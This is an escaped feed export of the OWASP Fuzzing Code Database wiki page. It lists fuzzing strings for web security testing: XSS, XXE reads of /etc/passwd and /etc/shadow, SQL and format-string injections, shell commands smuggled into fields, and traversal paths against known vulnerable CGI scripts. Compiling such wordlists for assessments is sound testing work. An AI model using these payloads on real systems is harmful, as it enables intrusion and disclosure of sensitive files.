&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81044</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81044"/>
				<updated>2010-04-06T21:20:41Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* File Upload Filter Bypass (Update: 17 March 2010 - notes only) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
